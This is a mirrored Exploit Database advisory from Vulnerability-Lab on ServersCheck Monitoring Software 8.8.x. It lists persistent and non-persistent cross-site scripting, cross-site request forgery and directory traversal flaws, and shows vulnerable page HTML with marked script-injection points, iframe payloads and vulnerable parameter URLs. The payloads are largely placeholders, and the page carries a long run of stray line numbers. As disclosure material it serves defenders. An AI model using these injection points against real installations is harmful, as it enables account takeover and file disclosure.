ServersCheck Monitoring Software 8.8.x – Multiple Vulnerabilities

Exploit Database
129 阅读

作者： Vulnerability-Lab

日期： 2011-09-27
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/36174/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

source: https://www.securityfocus.com/bid/49793/info

ServersCheck Monitoring Software is prone to multiple remote input-validation vulnerabilities, including:

1. Multiple HTML-injection vulnerabilities

2. Multiple cross-site scripting vulnerabilities

3. A cross-site request forgery vulnerability

4. Multiple local file-include vulnerabilities

5. A security vulnerability that may allow attackers to send arbitrary SMS messages from the vendor's phone number.

An attacker can exploit these issues to execute arbitrary HTML and script code in the context of the browser or the Web server, gain access to sensitive information, send multiple SMS messages, and perform certain administrative tasks. Other attacks are also possible.

Code Review: Input Validation Vulnerabilities (Persistent)

http://www.example.com/userslist.html?

<table border="0" cellpadding="0" cellspacing="0" class="tabdata"

width='98%'>

<td width=90%><b>Benutzername</b></td>

<td align=center><b>Zugriffsrechte</b></td>

<td align=center><b>Löschen</b></td></tr>

<tr bgcolor='#ffef95'><td style='padding-left:3px;padding-right:3px;'><a

href='/usersettingsedit.html?username=

> >"<INSERT SCRIPTCODE HERE!>&'>>"<INSERT OWN PERSISTENT SCRIPTCODE

HERE!!!></a></td>

<td align=center><a href="https://www.exploit-db.com/usersettingsedit.html?username=>"<INSERT OWN

PERSISTENT SCRIPTCODE HERE!!!>">

<td align=center><a href='' onclick="return deleteit('0');"><img

src='/output/images/delete.gif?' border=0></a></td>

</tr><tr ><td style='padding-left:3px;padding-right:3px;'><a

href='/usersettingsedit.html

?username=>"<iframe src=http://test.de>&'>>"<INSERT OWN PERSISTENT

SCRIPTCODE HERE!!!></a></td>

<td align=center><a href="https://www.exploit-db.com/usersettingsedit.html?username=>"<INSERT OWN

PERSISTENT SCRIPTCODE HERE!!!>">

<td align=center><a href='' onclick="return deleteit('1');"><img

src='/output/images/delete.gif?' border=0></a></td>

</tr></table><br><form action=usersadd.html method=post><td><input

type=hidden name=add value=yes>

http://www.example.com/downtime.html

<div style='padding-left:5px;padding-top:5px;'><font color=black

style="font-size: 16px;"><strong>

Downtime Bericht >"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!> (1171011122)

</strong></font>

<hr align="left" width="97%" size="1" color="#ff9900" noshade

style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.

Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">

<br><div id="overDiv" style="position:absolute; visibility:hidden;

z-index:1000;"></div>

http://www.example.com/windowsaccountslist.html

<td><b>Benutzername</b></td>

<td align=center><b>Löschen</b></td>

</tr>

<tr bgcolor='#ffef95'><td style='padding-left:3px;padding-right:3px;'><a

href='/windowsaccountsedit.html?id=

1269018355&'>>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!></a></td>

<td align=center><a href='' onclick="return

deleteit('1269018355');"><img src='/output/images/delete.gif?'

border=0></a></td>

</tr></table><br>

<form action=windowsaccountsedit.html method=post><td><input type=hidden

name=add value=yes>

http://www.example.com/msnsettings.html

<div id="overDiv" style="position:absolute; visibility:hidden;

z-index:1000;"></div>

<div style='padding-left:5px;padding-top:5px;'><font color=black

style="font-size: 16px;"><strong>

Konfiguriere MSN Warnung

</strong></font>

<hr align="left" width="97%" size="1" color="#ff9900" noshade

style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient

(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">

<br>Sie müssen ein MSN Konto festlegen, von dem das MSN basierten

Warnungen geschickt werden.<br>

alert('Einstellungen gespeichert');

</script><div id='stylized' class='settingsform'>

<label>MSN Konto Name</label><input type=text name=account size=30

value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"><br>

<label>MSN Konto Passwort</label><input type=password name=password

size=10 value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"<br>

<br><br><input type=submit class='buttonok' value="EINSTELLUNGEN

SPEICHERN" ></form></div>

http://www.example.com/enterprisesettings2.html

<label>IP, an die die Traps gesendet werden</label><input type=text

name=newsetting0 size=30 value="127.0.0.1" >

<a onmouseover="return overlib('Geben Sie eine IP Adresse oder einen

Domänennamen ein, an welche die Traps gesendet

werden', LEFT);" onmouseout="return nd();"><img

src="https://www.exploit-db.com/output/images/info.gif?" border=0 alt='Info'></a><br>

<label>Port</label><input type=text name=newsetting1 size=30

value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!><br>

<label>Der Community String.</label><input type=text name=newsetting2

size=30 value="" ><br>

<br><br><input type=hidden value="127.0.0.1<X>>"<INSERT OWN PERSISTENT

SCRIPTCODE HERE!!!>" name=previoussetting><input type=hidden value=""

name=check><input type=submit class='buttonok' value="EINSTELLUNGEN

SPEICHERN" > <input type=button

value="SENDUNG VON SNMP TRAPS BEENDEN" class='buttonnok'

Onclick="this.form.stop.value=1; this.form.submit();"></form></div>

http://www.example.com/settings.html?setting=LOGGING&

<label>Datenbank Vorlagen</label><select name=odbctemplate

onchange="javascript:changetemplate();">

<option value="">Wähle eine Datenbank Vorlage</option>

<option value="Driver={Oracle ODBC

Driver};Dbq=myDBName;Uid=myUsername;Pwd=myPassword">Oracle ODBC

Driver</option>

<option value="Driver={Microsoft ODBC for

Oracle};Server=OracleServer.world;Uid=myUsername;Pwd=myPassword">Microsoft

Oracle ODBC Driver</option>

<option value="Driver={INFORMIX 3.30 32

BIT};Host=hostname;Server=myserver;Service=service-name;Protocol=olsoctcp;Database=mydb;UID=username;PWD=myPwd

">Informix 3.30 ODBC Driver</option>

<option value="Driver={Pervasive ODBC Client

Interface};ServerName=srvname;dbq=">Pervasive ODBC Driver</option>

<option value="Driver={SQL Server}; Server=(local); Database=myDBName;

UID=sa; PWD=;">MS SQL ODBC Driver</option>

<option value="Driver={SQL Server Native Client 10.0};

Server=enter_IP_here; Database=enter_db_name_here;

UID=enter_account_name_here;

PWD=enter_password_here;">MS SQL 2008</option>

<option value="Driver={Microsoft Access Driver (*.mdb)};

DBQ=C:myDBName.mdb">MS Access ODBC Driver</option>

<option value="Driver={Microsoft Excel Driver (*.xls)};DBQ=physical path

to .xls file; DriverID=278;">MS Excel ODBC Driver</option>

<option value="Driver={Microsoft Text Driver

(*.txt;*.csv)};DefaultDir=physical path to .txt file;">Text ODBC

Driver</option>

<option value="DRIVER={MySQL ODBC 3.51

Driver};SERVER=;DATABASE=;USER=;Password=">mySQL ODBC 3.51</option>

</select><br><label>ODBC Verbindungsstring</label><input type=text

name=newsetting0 size=50 value=">"<INSERT SCRIPTCODE HERE!>" ><br><br>

<label>Speichere Werte in der Datenbank</label><input type=checkbox

name=newsetting1 value="true" > Ja<br><br><br>

<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE

HERE!!!><X><X><X><X>" name=previoussetting><input

type=hidden value="ODBC" name=check>

<input type=button class='buttonnok' value="DATABANKERFASSUNG BEENDEN"

Onclick="this.form.stop.value=1; this.form.submit();"></form>

</div><br><br></table><br><br> </td></tr></table>

<label>ODBC Verbindungsstring</label><input type=text name=newsetting0

size=50 value=">"<iframe src=http://vulnerability-lab.com width=600

height=600>"

> ><br><br><label>Speichere Werte in der Datenbank</label><input

type=checkbox name=newsetting1 value="true" > Ja<br><br><br>

<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE

HERE!!!><X><X><X><X>" name=previoussetting><input type=hidden

value="ODBC" name=check>

<input type=button class='buttonnok' value="DATABANKERFASSUNG BEENDEN"

Onclick="this.form.stop.value=1; this.form.submit();"></form>

</div>

References:

http://www.example.com/userslist.html?

http://www.example.com/teamslist.html?

http://www.example.com/windowsaccountsedit.html

http://www.example.com/bulkedit.html?

http://www.example.com/msnsettings.html

http://www.example.com/enterprisesettings2.html

http://www.example.com/settings.html?setting=LOGGING&

1.2

Code Review: Input Validation Vulnerabilities (Non Persistent)

http://www.example.com/checks2def.html

<form action=checks3other.html method=post name=checksdef

onSubmit='return checkrequired(this)'>

<input type=hidden name=linenumber value=">"<NON-PERSITENT SCRIPTCODE

HERE!>"><input type=hidden name=type value="">

<input type=hidden name=addcheck value=""><input type=hidden

name=editsettings value="1">

<td>Überwachungregel Bezeichnung</td><td><input type=text size=35

name=namevisible value="WINDOWSHEALTH" style='width:250px;'></td><td>

</td></tr><tr><td>Geräte-Name</td><td>

http://www.example.com/check2alerts.html

<form method=post action=checks2alerts.html name=alerts

target="main"><td> <td><input type=hidden value=""

name=linenumber><input type=hidden value="" name=check> <input

type=button value='FEHLER MELDUNGEN' alt="/checks2alerts.html?

linenumber=&check=&type=down&KeepThis=true&TB_iframe=true&height=400&width=850"

title='Bearbeite Alarme für den FEHLER

– Status' class='thickbox buttonalertsdown'></td></form>

</td><td><input class='buttonnok' type=submit value="

REGEL LöSCHEN" onclick="return deleteit('>"<NON-PERSITENT SCRIPTCODE

HERE!','');" onmouseover="return overlib('Durch klicken auf dieses Icon

können

Sie die Überwachungsregel löschen. Diese Operation kann nicht rückgängig

gemacht werden.', LEFT);" onmouseout="return nd();"></td></form>

</tr></table></div><br><br>

http://www.example.com/viewalerts.html

<div style='padding-left:5px;padding-top:5px;'><font color=black

style="font-size: 16px;"><strong>

Regel Historie >"<NON-PERSITENT SCRIPTCODE HERE!> (<a

href="https://www.exploit-db.com/viewfile.html?file=\checkslogs\1171011122.log">1171011122</a>)

</strong></font><hr align="left" width="97%" size="1" color="#ff9900"

noshade style="padding-top:0px; filter:

progid:DXImageTransform.Microsoft.Gradient(startColorStr='#ffcc00',

endColorStr='white', gradientType='1')">

<br>

http://www.example.com/downtime.html

<div style='padding-left:5px;padding-top:5px;'><font color=black

style="font-size: 16px;"><strong>

Downtime Bericht >"<NON-PERSITENT SCRIPTCODE HERE!> (1171011122)

</strong></font>

<hr align="left" width="97%" size="1" color="#ff9900" noshade

style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.

Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">

<br><div id="overDiv" style="position:absolute; visibility:hidden;

z-index:1000;"></div>

Non Persistent References:

http://www.example.com/checks2def.html?id=

http://www.example.com/checks2def.html?id=1171011122&linenumber=6&check=

http://www.example.com/checks2def.html?id=1171011122&linenumber=

http://www.example.com/downtime.html?label=

http://www.example.com/downtime.html?label=1171011122&keyz=1171011122WINDOWSHEALTH&labelvisible=

http://www.example.com/timeline/timeline.html?xml=

http://www.example.com/devicegraphs.html?device=

http://www.example.com/viewgraphs.html?label=

http://www.example.com/viewalerts.html?label=1171011122&labelvisible=

1.3

Code Review: Cross Site Request Forgery (Force|Non Persistent)

<div

style="padding-left:5px;padding-right:5px;padding-top:10px;padding-bottom:10px;width:90%">

<div style='padding-left:5px;padding-top:5px;'><font color=black

style="font-size: 16px;"><strong>

Definere Einstellungen zur Dienstanmeldung.

</strong></font>

<hr align="left" width="97%" size="1" color="#ff9900" noshade

style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient

(startColorStr='#ffcc00', endColorStr='white', gradientType='1')"> <br>

ServersCheck läuft als ein Dienst auf diesem Computer. Standardmäßig

laufen alle Dienste von Windows unter dem lokalen Systemkonto.

Ein Dienst hat Zugang auf die Maschine, wo er gerade läuft, aber es ist

ihm ein Remotezugriff andere Computer untersagt. Für Windows

basierende Checks (Plattenspeicherplatz, Speicher, CPU...), muss der

ServersCheck Monitoring-Dienst unter einem Windows Admin-Konto

laufen.<br><br>

Setze hier die Domäne oder den System-Admin Benutzernamen mit Passwort.

Zum Auslassen dieser Option bitte leer lassen.<br><br>

<form action=popup_service2.html method=post name=service setting><table

cellpadding=5><tr><td>

Administrator Benutzername</td><td align=right>

Administrator Passwort</td><td align=right>

<br><br><input type=submit class='buttonok' value=">> AKTUALISIERUNG" >

<input type=button class='buttonnok'

value="SKIP" Onclick="window.location='/popup1.html';">

</form></div></div><br><br>

1.4

Code Review: Local Directory Traversal & Information Disclosure

http://www.example.com/viewlogfile2.html?file=scan.txt&

<div style='padding-left:5px;padding-top:5px;'><font color=black

style="font-size: 16px;"><strong>

ServersCheck Protokolldateibetrachter: scan.txt

</strong></font>

<hr align="left" width="97%" size="1" color="#ff9900" noshade

style="padding-top:0px;

filter:progid:DXImageTransform.Microsoft.Gradient(startColorStr='#ffcc00',

endColorStr='white', gradientType='1')"><br>

<a href="https://www.exploit-db.com/emptyfile.html?file=logging\scan.txt&">Leere Datei</a>

<a href="https://www.exploit-db.com/emptyfile.html?file=logging\scan.txt&delete=true&">Löschen

Protokolldatei</a>

# Fri Mar 19 17:37:52 2010 Scanning ><iframe

src=http://vulnerability-lab.com width=600 height=600>..: Ping Failed

or ...

<HTML>

<HEAD>

<TITLE>ServersCheck 21 Day Evaluation Edition - version 8.0.8</TITLE>

<LINK HREF="https://www.exploit-db.com/output/css/thickbox.css" rel="stylesheet" type="text/css"

media="screen" />

</HEAD>

<div style='padding-left:5px;padding-top:5px;'><font color=black

style="font-size: 16px;"><strong>

ServersCheck Protokolldateien</strong></font>

<hr align="left" width="97%" size="1" color="#ff9900" noshade

style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.

Gradient(startColorStr='#ffcc00', endColorStr='white',

gradientType='1')"><br>

Um die Protokolldatei anzusehen, klicken Sie auf den Hyperlink, um sie

zu öffnen.<br><ul>

<li><a

href="https://www.exploit-db.com/viewlogfile2.html?file=graphs-errors.log&">graphs-errors.log</a></li>

<li><a

href="https://www.exploit-db.com/viewlogfile2.html?file=monitoring_manager_2010-3-19.log&">monitoring_manager_2010-3-19.log</a></li>

<li><a

href="https://www.exploit-db.com/viewlogfile2.html?file=statuschange_2010-3-19.log&">statuschange_2010-3-19.log</a></li>

<li><a href="https://www.exploit-db.com/viewlogfile2.html?file=watcher.log&">watcher.log</a></li>

</ul></div><br><br> </BODY></HTML>